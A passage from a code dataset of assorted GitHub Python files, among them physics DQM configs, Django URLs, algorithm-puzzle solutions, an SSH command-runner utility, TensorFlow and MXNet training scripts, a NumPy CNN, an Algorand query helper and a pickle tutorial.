16","repo_name":"bvillasen/cosmo_simulations","sub_path":"plot_functions/figure_functions.py","file_name":"figure_functions.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32610194280","text":"import FWCore.ParameterSet.Config as cms\n\nfrom PhysicsTools.NanoAOD.nanoDQM_cfi import nanoDQM\n\nnanoDQMMC = nanoDQM.clone()\nnanoDQMMC.vplots.Electron.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Muon.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Photon.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Tau.sels.Prompt = cms.string(\"genPartFlav == 5\")\nnanoDQMMC.vplots.Jet.sels.Prompt = cms.string(\"genJetIdx != 1\")\nnanoDQMMC.vplots.Jet.sels.PromptB = cms.string(\"genJetIdx != 1 && hadronFlavour == 5\")\n\nnanoDQMQTester = cms.EDAnalyzer(\"QualityTester\",\n qtList = cms.untracked.FileInPath('PhysicsTools/NanoAOD/test/dqmQualityTests.xml'),\n prescaleFactor = cms.untracked.int32(1), \n testInEventloop = cms.untracked.bool(False),\n qtestOnEndLumi = cms.untracked.bool(False),\n verboseQT = cms.untracked.bool(True)\n)\n\nnanoHarvest = cms.Sequence( nanoDQMQTester 
)\n","repo_name":"AnYpku/cmssw10x","sub_path":"PhysicsTools/NanoAOD/python/nanoDQM_cff.py","file_name":"nanoDQM_cff.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29315850882","text":"from django.conf.urls import patterns, url\nfrom niqati import views\nfrom niqati.models import COUPON, SHORT_LINK\n\nurlpatterns = patterns('',\n    url(r'^$', views.index, name='index'),\n    url(r'^submit/$', views.redeem, name='submit'),\n    url(r'^submit/claim/$', views.claim_code, name='claim_code'),\n    url(r'^submit/(?P<code>[\\w\\d]+)/$', views.redeem, name='submit_prefilled'),\n    url(r'^report/$', views.student_report, name='student_report'),\n    url(r'^report/(?P<username>[\\.\\w\\d\\-]+)/$', views.student_report, name='student_report_with_username'),\n    url(r'^collections/(?P<pk>\\d+)/download/coupons/$', views.download_collection,\n        {\"download_type\": COUPON}, name=\"download_coupons\"),\n    url(r'^collections/(?P<pk>\\d+)/download/links/$', views.download_collection,\n        {\"download_type\": SHORT_LINK}, name=\"download_links\"),\n    url(r'^orders/(?P<pk>\\d+)/$', views.download_collection, name='view_collec'),\n    url(r'^review/$', views.review_order, name='review_order'),\n    url(r'^short_url/$', views.get_short_url, name='get_short_url'),\n    url(r'^approve/$', views.list_pending_orders, name='list_pending_orders'),\n    url(r'^generalreport/$', views.general_report, name='general_report'),\n    url(r'^generalreport/(?P<city>\\w+)/$', views.general_report, name='general_report_for_city'),\n    url(r'^medicinereport/(?P<year>\\d+)/$', views.medicine_general_report, name='medicine_general_report'),\n    url(r'^niqati-user-autocomplete/$', views.NiqatiUserAutocomplete.as_view(), name='niqati-user-autocomplete',),\n    url(r'^report/(?P<username>[\\.\\w\\d\\-]+)/(?P<year>\\d+)/$', views.student_report,name='student_report_with_year'),\n)\n","repo_name":"enjaz/enjaz","sub_path":"niqati/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"}
+{"seq_id":"70067409537","text":"# A string is called a \"balanced parenthesis string\" if it contains the same number of '(' and ')'.\r\n# If, in addition, every '(' and ')' is correctly paired, it is called a \"correct parenthesis string\".\r\n# 1. If the input is an empty string, return an empty string.\r\n# 2. Split the string w into two \"balanced parenthesis strings\" u and v.\r\n#    Here u must be a \"balanced parenthesis string\" that cannot be split any further, and v may be an empty string.\r\n# 3. If u is a \"correct parenthesis string\", run the procedure again from step 1 on v.\r\n# 3-1. Append the resulting string to u and return it.\r\n# 4. If u is not a \"correct parenthesis string\", perform the steps below.\r\n# 4-1. Start with an empty string and append '(' as its first character.\r\n# 4-2. Append the result of running the procedure recursively from step 1 on v.\r\n# 4-3. Append ')'.\r\n# 4-4. Remove the first and last characters of u, flip the direction of every parenthesis in the remainder, and append it.\r\n# 4-5. Return the generated string.\r\n\r\nfrom collections import Counter\r\n# helper that checks whether a string is a correct parenthesis string\r\n# def right(s):\r\n#     stack = []\r\n#     for i in s:\r\n#         if len(stack) == 0:\r\n#             stack.append(i)\r\n#         elif stack[-1] == '(' and i == ')':\r\n#             stack.pop()\r\n#         else:\r\n#             stack.append(i)\r\n#\r\n#     return True if not stack else False\r\n#\r\n# def solution(p):\r\n#     answer = ''\r\n#     # split into u, v\r\n#     for i in range(2, len(p), 2):\r\n#         x = p[:i].count('(')\r\n#         y = p[:i].count(')')\r\n#         if x == y:\r\n#             u = p[:i]\r\n#             v = p[i:]\r\n#             break\r\n#     # recursion\r\n#     # the termination condition matters <- stop once the transformed p is a correct parenthesis string\r\n#     if right(u):\r\n#         v = solution(v)\r\n#     else: # if right(u) is False\r\n#         u = u[1:len(u) - 1]\r\n#         u = u[::-1]\r\n#         v = '(' + solution(v) + ')' + u\r\n#\r\n#     # answer = u + v\r\n#     # if len(answer) == len(p):\r\n#     #     return answer\r\n#\r\n#     # return solution(answer)\r\n#\r\n# print(solution('()))((()'))\r\n\r\n# notion\r\n# tests whether you can implement the given logic exactly as described\r\n# tests whether you understand recursion and can write a recursive function\r\n# recursive function -> you must write the base case.\r\ndef solution(p):\r\n    # if the input is an empty string, return an empty string\r\n    if p == \"\":\r\n        return p\r\n\r\n    # split the string into u, v\r\n    cnt, idx = 0, 0\r\n    for i in range(len(p)):\r\n        if p[i] == '(':\r\n            cnt += 1\r\n        else:\r\n            cnt -= 1\r\n\r\n        if cnt == 0:\r\n            idx = i\r\n            break\r\n\r\n    u, v = p[:idx+1], p[idx+1:]\r\n\r\n    # if u is a correct parenthesis string, run again from step 1 on v\r\n    if u[0] == \"(\":  # u is already balanced, so if it starts with an opening parenthesis it is correct!\r\n        return u + solution(v)\r\n\r\n    # step 4\r\n    else:\r\n        # step 4-4\r\n        new_u = \"\"\r\n        for i in u[1:-1]:\r\n            if i == \"(\":\r\n                new_u += \")\"\r\n            else:\r\n                new_u += \"(\"\r\n\r\n        return \"(\" + solution(v) + \")\" + new_u\r\n\r\nprint(solution(\"()))((()\"))","repo_name":"Green0v0/TIL","sub_path":"Playdata/핵준특/2020카카오블라인드_괄호변환.py","file_name":"2020카카오블라인드_괄호변환.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"33941131034","text":"import os\nimport sys\nimport logging\nimport subprocess\n\n# constants\nDEFAULT_USER = 'qaas'\nDEFAULT_SSH_PORT = '10022'\nDEFAULT_LOCATION = 'localhost'\n\nclass QAASRunCMD:\n    def __init__(self, comm_port, machine=DEFAULT_LOCATION, ssh_port=DEFAULT_SSH_PORT, user=DEFAULT_USER):\n        self.machine = machine\n        self.ssh_port = ssh_port\n        self.user = user\n        # Use remote port forwarding; the local side then listens on the forwarded port, expecting the remote side to connect back\n        self.ssh_cmd = f\"/usr/bin/ssh -p {self.ssh_port} -R {comm_port}:localhost:{comm_port} \" + self.user + \"@\" + self.machine + \" \"\n\n    def run_cmd(self, cmdline):\n        runcmd = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        runcmd.out, runcmd.err = runcmd.communicate()\n        if runcmd.returncode != 0:\n            logging.error(runcmd.err.decode(\"utf-8\"))\n        logging.debug(runcmd.out.decode(\"utf-8\"))\n        return runcmd.returncode, runcmd.out.decode(\"utf-8\")\n\n    def copy_local_file(self, local_file, local_dir):\n        cp_cmd = f\"/usr/bin/cp {local_file} {local_dir}\"\n        logging.debug(\"cmdline=%s\", cp_cmd)\n        rc, cmdout = self.run_cmd(cp_cmd)\n        return rc, cmdout\n\n    def copy_remote_file(self, remote_file, local_dir):\n        scp_cmd = f\"/usr/bin/scp -P {self.ssh_port} \" + self.user + \"@\" + self.machine + f\":{remote_file} {local_dir}\"\n        logging.debug(\"cmdline=%s\", scp_cmd)\n        rc, cmdout = self.run_cmd(scp_cmd)\n        return rc, cmdout\n\n    def run_local_cmd(self, local_cmd):\n        \"\"\"Run a local command.\"\"\"\n        cmdline = \"/usr/bin/bash -c \" + local_cmd\n        logging.debug(\"cmdline=%s\", cmdline)\n        rc, cmdout = 
self.run_cmd(cmdline)\n        return rc, cmdout\n\n    def run_remote_cmd(self, remote_cmd):\n        \"\"\"Run a remote command over ssh.\"\"\"\n        cmdline = self.ssh_cmd + \" \" + remote_cmd\n        logging.debug(\"cmdline=%s\", cmdline)\n        rc, cmdout = self.run_cmd(cmdline)\n        return rc, cmdout\n","repo_name":"intel/program-optimization-advice-exploration-scripts","sub_path":"qaas-backplane/src/utils/runcmd.py","file_name":"runcmd.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"19294056654","text":"import tensorflow as tf\nimport shutil\nimport numpy as np\nimport os\n\nBUCKET = ''\nPROJECT = ''\nREGION = ''\n\n\nos.environ['BUCKET'] = BUCKET\nos.environ['PROJECT'] = PROJECT\nos.environ['REGION'] = REGION\n\n# Determine CSV, label and key columns\nCSV_COLUMNS = 'weight_pounds,is_male,mother_age,plurality,gestation_weeks,key'.split(',')\nLABEL_COLUMN = 'weight_pounds'\nKEY_COLUMN = 'key'\n\n# Set default values for each CSV column\nDEFAULTS = [[0.0], ['null'], [0.0], ['null'], [0.0], ['nokey']]\nTRAIN_STEPS = 1000\n\n# Create an input function reading a file using the Dataset API\n# Then provide the results to the Estimator API\ndef read_dataset(filename, mode, batch_size=512):\n\n    def _input_fn():\n\n        def decode_csv(value_column):\n            columns = tf.decode_csv(value_column, record_defaults=DEFAULTS)\n            features = dict(zip(CSV_COLUMNS, columns))\n            label = features.pop(LABEL_COLUMN)\n            return features, label\n\n        # create list of files that match pattern\n        file_list = tf.gfile.Glob(filename)\n\n        # Create dataset from file list\n        dataset = (tf.data.TextLineDataset(file_list).map(decode_csv))\n\n        if mode == tf.estimator.ModeKeys.TRAIN:\n            num_epochs = None\n            dataset = dataset.shuffle(buffer_size=10*batch_size)\n        else:\n            num_epochs = 1\n        dataset = dataset.repeat(num_epochs).batch(batch_size)\n\n        return dataset.make_one_shot_iterator().get_next()\n\n    return _input_fn\n\n\n# Define feature columns\ndef get_categorical(name, values):\n    return tf.feature_column.indicator_column(\n        tf.feature_column.categorical_column_with_vocabulary_list(name, values)\n    )\n\ndef get_cols():\n    return [\n        get_categorical('is_male', ['True', 'False', 'Unknown']),\n        tf.feature_column.numeric_column('mother_age'),\n        get_categorical('plurality', ['Single(1)', 'Twins(2)', 'Triplets(3)', 'Quadruplets(4)', 'Quintuplets(5)']),\n        tf.feature_column.numeric_column('gestation_weeks')\n    ]\n\n# Features for the DNNLinearCombinedRegressor model\ndef get_wide_deep():\n    is_male, mother_age, plurality, gestation_weeks = [\n        tf.feature_column.categorical_column_with_vocabulary_list('is_male', ['True', 'False', 'Unknown']),\n        tf.feature_column.numeric_column('mother_age'),\n        tf.feature_column.categorical_column_with_vocabulary_list('plurality', ['Single(1)', 'Twins(2)', 'Triplets(3)', 'Quadruplets(4)', 'Quintuplets(5)']),\n        tf.feature_column.numeric_column('gestation_weeks')\n    ]\n    # Discretize\n    age_buckets = tf.feature_column.bucketized_column(mother_age, boundaries=np.arange(15,45,1).tolist())\n    gestation_buckets = tf.feature_column.bucketized_column(gestation_weeks, boundaries=np.arange(17,41,1).tolist())\n    # Sparse columns are wide, have a linear relationship with the output\n    wide = [\n        is_male,\n        plurality,\n        age_buckets,\n        gestation_buckets\n    ]\n    # Feature cross all the wide columns and embed into a lower dimension\n    crossed = tf.feature_column.crossed_column(wide, hash_bucket_size=20000)\n    embed = tf.feature_column.embedding_column(crossed, 3)\n\n    # Continuous columns are deep, have a complex relationship with the output\n    deep = [\n        mother_age,\n        gestation_weeks,\n        embed\n    ]\n\n    return wide, deep\n\ndef serving_input_fn():\n    feature_placeholders = {\n        'is_male': tf.placeholder(tf.string, [None]),\n        'mother_age': tf.placeholder(tf.float32, [None]),\n        'plurality': tf.placeholder(tf.string, [None]),\n        'gestation_weeks': tf.placeholder(tf.float32, [None])\n    }\n    features = {\n        key: tf.expand_dims(tensor, -1) for key, tensor in feature_placeholders.items()\n    }\n    return tf.estimator.export.ServingInputReceiver(features, feature_placeholders)\n\n# train and evaluate for DNNRegressor\ndef train_and_evaluate(output_dir):\n    EVAL_INTERVAL = 300\n    run_config = tf.estimator.RunConfig(save_checkpoints_secs = EVAL_INTERVAL, keep_checkpoint_max=3)\n    estimator = tf.estimator.DNNRegressor(\n        model_dir=output_dir,\n        feature_columns = get_cols(),\n        hidden_units=[64, 32],\n        config=run_config\n    )\n    train_spec = tf.estimator.TrainSpec(\n        input_fn=read_dataset('train.csv', mode=tf.estimator.ModeKeys.TRAIN),\n        max_steps=TRAIN_STEPS\n    )\n    exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)\n    eval_spec = tf.estimator.EvalSpec(\n        input_fn=read_dataset('eval.csv', mode=tf.estimator.ModeKeys.EVAL),\n        steps=None,\n        start_delay_secs=60,\n        throttle_secs=EVAL_INTERVAL,\n        exporters=exporter\n    )\n    tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\n# train and evaluate for DNNLinearCombinedRegressor\ndef train_and_evaluate(output_dir):\n    wide, deep = get_wide_deep()\n    EVAL_INTERVAL = 300\n    run_config = tf.estimator.RunConfig(save_checkpoints_secs=EVAL_INTERVAL, keep_checkpoint_max=3)\n    estimator = tf.estimator.DNNLinearCombinedRegressor(\n        model_dir=output_dir,\n        linear_feature_columns=wide,\n        dnn_feature_columns=deep,\n        config=run_config\n    )\n    train_spec = tf.estimator.TrainSpec(\n        input_fn=read_dataset('train.csv', mode=tf.estimator.ModeKeys.TRAIN),\n        max_steps=TRAIN_STEPS\n    )\n    exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)\n    eval_spec = tf.estimator.EvalSpec(\n        input_fn=read_dataset('eval.csv', mode=tf.estimator.ModeKeys.EVAL),\n        steps=None,\n        start_delay_secs=60,\n        throttle_secs=EVAL_INTERVAL,\n        exporters=exporter\n    )\n    tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\nshutil.rmtree('babyweight_trained', ignore_errors=True)\ntrain_and_evaluate('babyweight_trained')\n\nfrom google.datalab.ml import TensorBoard\nTensorBoard().start('./babyweight_trained')\n","repo_name":"kaimo455/Coursera-Course","sub_path":"Advanced-ML-with-TF-on-GCP-Specialization/week_2.py","file_name":"week_2.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"42432780461","text":"class Solution:\n    def countRangeSum(self, nums: List[int], lower: int, upper: int) -> int:\n        from sortedcontainers import SortedList\n        prefix, ret = 0, 0\n        st = SortedList([0])\n        for num in nums:\n            prefix += num\n            ret += st.bisect_right(prefix - lower) - st.bisect_left(prefix - upper)\n            st.add(prefix)\n        return ret\n","repo_name":"lih627/python-algorithm-templates","sub_path":"LeetCodeSolutions/LeetCode_0327.py","file_name":"LeetCode_0327.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"}
+{"seq_id":"3741106119","text":"import numpy as np\r\nimport pickle\r\nfrom PIL import Image\r\nimport pandas as pd\r\nimport matplotlib.pylab as 
plt\r\n\r\n\r\n\r\nclass cnnn():\r\n def __init__(self):\r\n pass\r\n\r\n\r\n def nanargmax(self, arr):\r\n idx = np.nanargmax(arr)\r\n idxs = np.unravel_index(idx, arr.shape) # Get index as multi dimension\r\n return idxs\r\n\r\n def load(self):\r\n with open('params2.pkl', 'rb') as f: # Python 3: open(..., 'rb')\r\n params = pickle.load(f)\r\n\r\n return params\r\n\r\n def relu(self, array):\r\n array[array <= 0] = 0\r\n return array\r\n\r\n def softmax(self, X):\r\n out = np.exp(X)\r\n return out / np.sum(out)\r\n\r\n def convolution(self, image, filt, bias, s=1):\r\n (n_f, n_c_f, f, _) = filt.shape # filter dimensions\r\n n_c, in_dim, _ = image.shape # image dimensions\r\n\r\n out_dim = int((in_dim - f) / s) + 1 # calculate output dimensions some mad formula ting\r\n\r\n # Dimensions of filter must match channels of input image\r\n\r\n out = np.zeros((n_f, out_dim, out_dim)) # If 8 filters, 8 dimensions(1) provided\r\n\r\n # convolve the filter over every part of the image, adding the bias at each step.\r\n # Need to look over and adjust\r\n for curr_f in range(n_f):\r\n curr_y = out_y = 0\r\n while curr_y + f <= in_dim:\r\n curr_x = out_x = 0\r\n while curr_x + f <= in_dim:\r\n # print(curr_f)\r\n out[curr_f, out_y, out_x] = np.sum(filt[curr_f] * image[:, curr_y:curr_y + f, curr_x:curr_x + f]) + \\\r\n bias[curr_f]\r\n curr_x += s # Slide across\r\n out_x += 1 # Move into next location for output\r\n curr_y += s # Slide down\r\n out_y += 1 # Move 1\r\n\r\n return out\r\n\r\n def maxpool(self, image, f=2, s=2):\r\n # Downsample image using size of f and stride of s\r\n\r\n n_c, h_prev, w_prev = image.shape # Get old/current dimensions\r\n\r\n h = ((h_prev - f) / s) + 1 # Calculate new dimensions of img\r\n w = ((w_prev - f) / s) + 1 # Int been moved so beware int((h_prev - f)/s)+1\r\n\r\n # print(image)\r\n # print(image[0, 0:2, 4:6]) #[channel num, x:x+2 , y:y+2], is a 2x2 grid\r\n\r\n output = np.zeros((n_c, int(h), int(w))) # Make empty array to be filled\r\n\r\n for i in range(n_c): # Once for each channel\r\n # slide maxpool window over each part of the image and assign the max value at each step to the output\r\n curr_y = out_y = 0 # Initialised\r\n while curr_y + f <= h_prev:\r\n curr_x = out_x = 0\r\n while curr_x + f <= w_prev: # Only runs till reaches end of line\r\n output[i, out_y, out_x] = np.max(image[i, curr_y:curr_y + f, curr_x:curr_x + f])\r\n curr_x += s # Slide across\r\n out_x += 1 # Next index in final array\r\n curr_y += s # Slide down\r\n out_y += 1 # Move into next index downwards\r\n\r\n return output\r\n\r\n def predict(self, image, f1, f2, w3, w4, b1, b2, b3, b4, conv_s=1, pool_f=2, pool_s=2):\r\n # Run an image through the CNN using the parameters\r\n\r\n conv1 = self.convolution(image, f1, b1)\r\n conv1 = self.relu(conv1) # Relu check\r\n\r\n conv2 = self.convolution(conv1, f2, b2)\r\n conv2 = self.relu(conv2)\r\n\r\n pooled = self.maxpool(conv2)\r\n (nf2, dim2, _) = pooled.shape\r\n fc = pooled.reshape((nf2 * dim2 * dim2, 1)) # Flattened\r\n\r\n # Now do predicting with ANN\r\n\r\n z = w3.dot(fc) + b3 # first dense layer\r\n z = self.relu(z) # [z<=0] = 0 # pass through ReLU non-linearity\r\n\r\n out = w4.dot(z) + b4 # second dense layer\r\n probs = self.softmax(out) # predict class probabilities with the softmax activation function\r\n\r\n return np.argmax(probs), np.max(probs)\r\n\r\n\r\n\r\n def main(self, image):\r\n\r\n im = Image.open(image)\r\n\r\n\r\n im = im.resize((28,28), Image.ANTIALIAS)\r\n\r\n im.save(image, dpi=(600, 600))\r\n\r\n frame = 
np.asarray(im)\r\n        frame = frame.transpose((2, 0, 1))  # HWC -> CHW; a reshape here would scramble the pixels (28*28*3 = 2352 values)\r\n        print(frame.shape)\r\n        print(frame)\r\n\r\n        # need to preprocess the image\r\n        [f1, f2, w3, w4, b1, b2, b3, b4] = self.load()\r\n\r\n        x, y = self.predict(frame, f1, f2, w3, w4, b1, b2, b3, b4)\r\n\r\n        return x, y\r\n\r\n\r\nif __name__ == '__main__':\r\n    X = cnnn()\r\n    print(X.main('temp/tempISIC_0024328.jpg'))\r\n\r\n\r\n\r\n","repo_name":"ramstar3000/SkinDetection","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29332945829","text":"#coding:utf8\n'''\npickle: data serialization\ncPickle is 1000 times faster than pickle\npickle.dump(obj, file[,protocol]): serialize data to a file descriptor\npickle.load(file): restore the object stored in a file to the original object; this process is called deserialization\n\nLimitations:\n1. pickle cannot guarantee the atomicity of its operations\n2. pickle has security issues\n3. the pickle protocol is Python-specific, so compatibility across languages is hard to guarantee\n'''\nimport cPickle as pickle\nmy_data = {\"name\" : \"Python\", \"type\":\"language\", \"version\":\"2.7.5\"}\nfp = open(\"picklefile.dat\", \"wb\") # open the file\npickle.dump(my_data, fp)\nfp.close()\n\nfp = open(\"picklefile.dat\", \"rb\")\nout = pickle.load(fp)\nfp.close()\nprint(out)\n\n\n'''\nFor objects that cannot be serialized, such as sockets, file handles, and database\nconnections, these limitations can be worked around by implementing the pickle\nprotocol, mainly through the special methods __getstate__() and __setstate__()\n'''\n\nclass TextReader:\n    def __init__(self, filename):\n        self.filename = filename\n        self.file = open(filename)\n        self.position = self.file.tell()\n    def readline(self):\n        line = self.file.readline()\n        self.position = self.file.tell()\n        if not line:\n            return None\n        if line.endswith('\\n'):\n            line = line[:-1]\n        return \"%i: %s\" % (self.position, line)\n    def __getstate__(self): # record the state of the file when it is pickled\n        state = self.__dict__.copy() # grab the instance dict at pickling time\n        del state['file']\n        return state\n    def __setstate__(self, state): # restore the state after deserialization\n        self.__dict__.update(state)\n        file = open(self.filename)\n        self.file = file\n\n\nreader = TextReader(\"zen.txt\")\nprint(reader.readline())\nprint(reader.readline())\n# dumps calls __getstate__ automatically\ns = pickle.dumps(reader)\n# loads calls __setstate__ automatically\nnew_reader = pickle.loads(s)\nprint(new_reader.readline())\n\n","repo_name":"heyulin1989/language","sub_path":"python/books/writing-solid-python-code-91-suggestions/44.py","file_name":"44.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"22191974991","text":"\"\"\" Defines media types with their attributes\r\n\"\"\"\r\n\r\nclass Movie():\r\n    \"\"\"Class stores the information related to a movie.\r\n\r\n    Attributes:\r\n        movie_title: The movie's title.\r\n        poster_image: URL to the movie's poster or box art.\r\n        trailer_youtube: URL to the movie's trailer on YouTube\r\n    \"\"\"\r\n\r\n    def __init__(self, movie_title, poster_image, trailer_youtube):\r\n        \"\"\"Inits Movie with title, image url and trailer url\"\"\"\r\n        self.title = movie_title #Assign title\r\n        self.poster_image_url = poster_image #Assign image url\r\n        self.trailer_youtube_url = trailer_youtube #Assign trailer url\r\n","repo_name":"Si047p/movie_trailer","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28141184296","text":"import mxnet as mx\nimport logging\nimport metric\n\nfrom collections import namedtuple\nfrom callback import Speedometer\nfrom config import config\n\nclass Solver(object):\n    def __init__(self, prefix,\n                 symbol, ctx=None,\n                 begin_epoch=0, 
num_epoch=None,\n kv_store='local',\n arg_params=None, aux_params=None,\n optimizer='sgd',\n max_data_shape=None, **kwargs):\n self.prefix = prefix\n self.symbol = symbol\n self.ctx = ctx\n if self.ctx is None:\n self.ctx = mx.cpu()\n self.begin_epoch = begin_epoch\n self.num_epoch = num_epoch\n self.kv_store = kv_store\n self.arg_params = arg_params\n self.aux_params = aux_params\n self.optimizer = optimizer\n self.updater = None\n self.max_data_shape = max_data_shape\n self.kwargs = kwargs.copy()\n\n self.arg_names = None\n self.param_names = None\n self.aux_names = None\n\n def get_params(self, grad_req):\n arg_names = self.symbol.list_arguments()\n self.arg_names = arg_names\n arg_shapes, out_shapes, aux_shapes = self.symbol.infer_shape(data=(1, 3, 224, 224), rois=(1, 5))\n if grad_req != 'null':\n param_names = []\n for name, shape in zip(arg_names, arg_shapes):\n if not (name.endswith('data') or name.endswith('rois') or\n name.endswith('inside_weight') or name.endswith('outside_weight') or\n name.endswith('label') or name.endswith('target') or\n name.startswith('conv1') or name.startswith('conv2')):\n param_names.append(name)\n self.param_names = list(param_names)\n aux_names = self.symbol.list_auxiliary_states()\n self.aux_names = aux_names\n self.aux_params = {k: mx.nd.zeros(s, self.ctx) for k, s in zip(aux_names, aux_shapes)}\n\n def fit(self, train_data,\n grad_req='write',\n frequent=20,\n logger=None):\n (kvstore, update_on_kvstore) = mx.model._create_kvstore(\n self.kv_store, len(self.ctx), self.arg_params)\n if logger is None:\n logger = logging\n logger.info('Start training with %s', str(self.ctx))\n\n batch_end_callback = Speedometer(train_data.batch_size, frequent=frequent)\n epoch_end_callback = mx.callback.do_checkpoint(self.prefix)\n\n self.get_params(grad_req)\n\n eval_metric = metric.Accuracy()\n cls_metric = metric.LogLossMetric()\n bbox_metric = metric.SmoothL1LossMetric()\n eval_metrics = mx.metric.CompositeEvalMetric()\n for child_metric in [eval_metric, cls_metric, bbox_metric]:\n eval_metrics.add(child_metric)\n max_data_shape = self.max_data_shape\n\n self.optimizer = mx.optimizer.create(self.optimizer, rescale_grad=(1.0 / config.TRAIN.BATCH_SIZE), **self.kwargs)\n mx.model._train_multi_device(self.symbol, self.ctx, self.arg_names, self.param_names,\n self.aux_names, self.arg_params, self.aux_params,\n begin_epoch=self.begin_epoch, end_epoch=self.num_epoch,\n epoch_size=None, optimizer=self.optimizer,\n train_data=train_data, eval_data=None,\n eval_metric=eval_metrics,\n epoch_end_callback=epoch_end_callback,\n batch_end_callback=batch_end_callback,\n kvstore=kvstore, update_on_kvstore=update_on_kvstore,\n logger=logger, work_load_list=None, monitor=None,\n mutable_data_shape=True, max_data_shape=self.max_data_shape)\n","repo_name":"zdltheone/mxnet_windows","sub_path":"mxnet/example/rcnn/rcnn/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1001820100","text":"from html.parser import HTMLParser\nclass MyHTMLParser(HTMLParser):\n def handle_comment(self, data):\n if \"\\n\" in data:\n print(\">>> Multi-line Comment\")\n else:\n print(\">>> Single-line Comment\")\n print(data)\n def handle_data(self, data):\n if data != \"\\n\":\n print(\">>> Data\")\n print(data) \ndef parse(string):\n parser = MyHTMLParser()\n parser.feed(string)\n parser.close()\n\nn = int(input()) \nparse('\\n'.join([input() for _ in range(n)])) 
\n","repo_name":"Harjacober/HackerrankSolvedProblems","sub_path":"Python/HTML Parser - Part 2.py","file_name":"HTML Parser - Part 2.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71470928895","text":"import logging\nfrom typing import Optional\nimport datetime\nimport aiohttp\nfrom dataclasses import dataclass\nimport requests\nimport aiohttp.client_exceptions\n\n\n@dataclass\nclass QueryParams:\n after_time: Optional[datetime.datetime] = None\n before_time: Optional[datetime.datetime] = None\n min_block: Optional[int] = None\n max_block: Optional[int] = None\n\n def make_params(self):\n params = {}\n if self.before_time is not None:\n params['before-time'] = self.before_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n if self.after_time is not None:\n params['after-time'] = self.after_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n if self.min_block is not None:\n params['min-round'] = self.min_block\n if self.min_block is not None:\n params['max-round'] = self.max_block\n return params\n\n\ndef get_current_round():\n url = f'https://algoindexer.algoexplorerapi.io/v2/transactions'\n req = requests.get(url=url).json()\n return int(req['current-round'])\n\n\nclass QueryError(Exception):\n def __init__(self, msg):\n super().__init__(msg)\n\n\nasync def query_transactions(session: aiohttp.ClientSession,\n params: dict,\n num_queries: Optional[int],\n query_params: QueryParams):\n logger = logging.getLogger(__name__)\n\n query = f'https://algoindexer.algoexplorerapi.io/v2/transactions'\n\n params = {**params, **query_params.make_params()}\n\n async with session.get(query, params=params) as resp:\n ok = resp.ok\n if not ok:\n msg = f'Session response not OK:, query = {query}, params = {params}'\n raise QueryError(msg)\n\n try:\n resp = await resp.json()\n except aiohttp.client_exceptions.ContentTypeError as e:\n logger.critical(\"resp.json failed\"\n f\"\\n{resp} = resp\")\n raise e\n\n i = 0\n while resp and (num_queries is None or i < num_queries):\n for tx in resp['transactions']:\n yield tx\n\n if 'next-token' in resp:\n async with session.get(query, params={**params, **{'next': resp['next-token']}}) as resp:\n resp = await resp.json()\n else:\n resp = None\n i += 1\n","repo_name":"lrnz-vtl/Algotrading","sub_path":"algo/blockchain/algo_requests.py","file_name":"algo_requests.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5645892425","text":"# -*- coding:utf-8 -*-\n# from Preprocessing import PreProcessing\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time\n\n\nclass EDA:\n\n '''箱形图,通常用来确认数据的分布情况,如最大值最小值,可用来确定异常值'''\n def boxplot(self, data):\n # data = pd.DataFrame({\n # \"dataSet1\": [1, 2, 9, 6],\n # \"dataSet2\": [7, 9, 90, 3],\n # \"dataSet3\": [78, 90, 190, 6],\n # \"dataSet4\": [78, 9, 0, 87],\n # })\n # draw\n '''最大值,最小值,均值,上四分位,下四分位'''\n data.boxplot()\n plt.ylabel(\"value\")\n plt.xlabel(\"label\")\n plt.show()\n\n '''柱状图'''\n def bar(self, x, y):\n plt.bar(x, y, width=0.35, facecolor='lightskyblue', edgecolor='white')\n plt.show()\n\n '''确定每一列数据的分布情况'''\n def hist(self, data):\n # data = pd.DataFrame({\n # 